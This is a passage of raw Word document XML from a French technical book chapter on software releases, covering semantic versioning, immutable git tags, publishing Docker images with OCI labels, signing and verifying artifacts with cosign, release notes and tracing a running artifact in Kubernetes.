            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Correctif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Correction compatible</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Majeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3688"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rupture de compatibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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0.x.y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Instable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Aucune garantie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RUPTURE DE COMPATIBILITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Changement qui oblige un dépendant à modifier son code : suppression d'une fonction, changement de type, modification de comportement par défaut.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes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Étiquettes mobiles et immuables</w:t>
        <w:br/>
        <w:t>git tag -a v1.4.2 -m "Version 1.4.2"</w:t>
        <w:br/>
        <w:t>git push origin v1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne jamais déplacer une étiquette publiée</w:t>
        <w:br/>
        <w:t># Une correction = une nouvelle version</w:t>
        <w:br/>
        <w:br/>
        <w:t># Lister les étiquettes et leur date</w:t>
        <w:br/>
        <w:t>git for-each-ref --sort=-creatordate \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --format='%(refname:short) %(creatordate:short)' refs/tags | head -5</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UNE ÉTIQUETTE DÉPLACÉE FABRIQUE DES FANTÔMES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>v1.4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> désigne deux contenus différents selon la date, aucune investigation ne peut aboutir. Une version publiée est immuable ; toute correction produit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>v1.4.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>80.2 Publier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un registre stocke des artefacts nommés et versionnés. La publication doit être reproductible et traçable : l'artefact porte son commit source et le pipeline qui l'a produit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois étiquettes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Publier une image avec plusieurs étiquettes</w:t>
        <w:br/>
        <w:t>docker build \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --label org.opencontainers.image.revision="$(git rev-parse HEAD)" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --label org.opencontainers.image.version="1.4.2" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --label org.opencontainers.image.source="https://github.com/org/app" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t registry.exemple.fr/app:1.4.2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t registry.exemple.fr/app:1.4 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t registry.exemple.fr/app:latest .</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker push registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:t>docker push registry.exemple.fr/app:1.4</w:t>
        <w:br/>
        <w:t>docker push registry.exemple.fr/app:latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.305 — Quatre étiquettes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69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Étiquette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déploiement de production</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Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Suivre les correctifs</w:t>
            </w:r>
          </w:p>
        </w:tc>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Change sans préavis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démonstration</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Impossible à reproduire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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empreinte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Audit et promotion</w:t>
            </w:r>
          </w:p>
        </w:tc>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Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Vérifier les métadonnées réellement publiées</w:t>
        <w:br/>
        <w:t>docker buildx imagetools inspect registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparer deux images par leurs couches</w:t>
        <w:br/>
        <w:t>docker image inspect app:1.4.2 --format '{{.RootFS.Layers}}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Rechercher les vulnérabilités de l'image publiée</w:t>
        <w:br/>
        <w:t>trivy image --severity HIGH,CRITICAL registry.exemple.fr/app:1.4.2</w:t>
      </w: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NE DÉPLOYEZ JAMAIS `LATEST`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>latest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ne dit rien sur le contenu. En cas d'incident, il est impossible de savoir ce qui tournait la veille. Déployez une version ou une empreinte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>80.3 Signer et vérifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La signature relie un artefact à une identité. Elle ne prouve pas que le logiciel est sûr, mais elle prouve qu'il vient bien de celui qui l'a signé et qu'il n'a pas été modifié.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux modèles de signature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Signature d'une image avec cosign</w:t>
        <w:br/>
        <w:t>cosign generate-key-pair</w:t>
        <w:br/>
        <w:t>cosign sign --key cosign.key registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification avant déploiement</w:t>
        <w:br/>
        <w:t>cosign verify --key cosign.pub registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Signature sans clé, liée à l'identité de la CI (OIDC)</w:t>
        <w:br/>
        <w:t>cosign sign registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:t>cosign verify \</w:t>
        <w:br/>
        <w:t>--certificate-identity-regexp</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'https://github.com/org/app/.github/workflows/.*' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --certificate-oidc-issuer https://token.actions.githubusercontent.com \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  registry.exemple.fr/app:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.306 — Quatre preuves et leurs limites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09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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Ce qu'il prouve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Ce qu'il ne prouve pas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signature</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Origine et intégrité</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Absence de vulnérabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Attestation de provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>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Comment l'artefact a été construit</w:t>
            </w:r>
          </w:p>
        </w:tc>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Qualité du code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Analyse de vulnérabilités</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Absence de failles connues</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Absence de failles inconnues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Revue de code</w:t>
            </w:r>
          </w:p>
        </w:tc>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Relecture humaine</w:t>
            </w:r>
          </w:p>
        </w:tc>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Absence d'erreur</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ATTESTATION DE PROVENANCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Document signé décrivant la construction : dépôt source, commit, pipeline, dépendances. Il répond à la question « d'où vient ce binaire ? ».</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux contrôles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Vérifier la provenance d'une image</w:t>
        <w:br/>
        <w:t>gh attestation verify oci://registry.exemple.fr/app:1.4.2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --repo org/app</w:t>
        <w:br/>
        <w:br/>
        <w:t># Refuser une image dont la provenance est inconnue</w:t>
        <w:br/>
        <w:t>if ! cosign verify --key cosign.pub "$IMAGE" &gt;/dev/null 2&gt;&amp;1; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "image non signée, déploiement refusé" &gt;&amp;2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exit 1</w:t>
        <w:br/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>80.4 Notes de version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une note de version s'adresse à ceux qui utilisent le logiciel, pas à ceux qui l'ont écrit. Elle décrit les changements visibles, les migrations nécessaires et les corrections de sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux notes de version · markdown</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1.4.2 — 2026-10-19</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Correction</w:t>
        <w:br/>
        <w:t>- Le cache des sessions n'expire plus prématurément (#4821).</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Sécurité</w:t>
        <w:br/>
        <w:t>- Mise à jour de `libxml2` vers 2.12.7 (CVE-2026-12345).</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Migration</w:t>
        <w:br/>
        <w:t>Aucune action requise.</w:t>
        <w:br/>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:br/>
        <w:t>## 1.5.0 — 2026-11-03</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Ajout</w:t>
        <w:br/>
        <w:t>- Export CSV des rapports (#4902).</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Déprécié</w:t>
        <w:br/>
        <w:t>- `GET /api/v1/rapports` sera supprimé en 2.0. Utilisez `GET</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /api/v2/rapports`.</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Migration</w:t>
        <w:br/>
        <w:t>Remplacez les appels à `/api/v1/rapports` avant la version 2.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes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Générer la liste des changements depuis la dernière étiquette</w:t>
        <w:br/>
        <w:t>git log --oneline v1.4.1..v1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier qu'aucun commit n'est oublié</w:t>
        <w:br/>
        <w:t>git log --format='%h %s' v1.4.1..HEAD --no-merges</w:t>
        <w:br/>
        <w:br/>
        <w:t># Regrouper par type de commit</w:t>
        <w:br/>
        <w:t>git log --format='%s' v1.4.1..HEAD | grep -E '^(feat|fix|security)' | sort</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CE QUI REND UNE PUBLICATION FIABLE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Une version immuable, jamais réutilisée.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Une provenance signée et vérifiable.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 inventaire des composants (SBOM).</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Des notes orientées utilisateur.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Une politique de conservation des artefacts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>80.5 Retrouver la provenance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lors d'un incident, la question n'est pas « qui a écrit cette ligne ? » mais « quel artefact tourne, avec quelles dépendances, et depuis quand ? »</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="92" name="Picture 92"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f90.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.90 — Remonter d'un incident à une source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois réponses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Quel artefact tourne réellement ?</w:t>
        <w:br/>
        <w:t>kubectl get deployment app -n production \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -o jsonpath='{.spec.template.spec.containers[0].image}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Quel commit a produit cet artefact ?</w:t>
        <w:br/>
        <w:t>crane config "$IMAGE" | jq -r</w:t>
        <w:br/>
        <w:t xml:space="preserve">  '.config.Labels["org.opencontainers.image.revision"]'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Depuis quand cette version est-elle déployée ?</w:t>
        <w:br/>
        <w:t>kubectl rollout history deployment/app -n production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
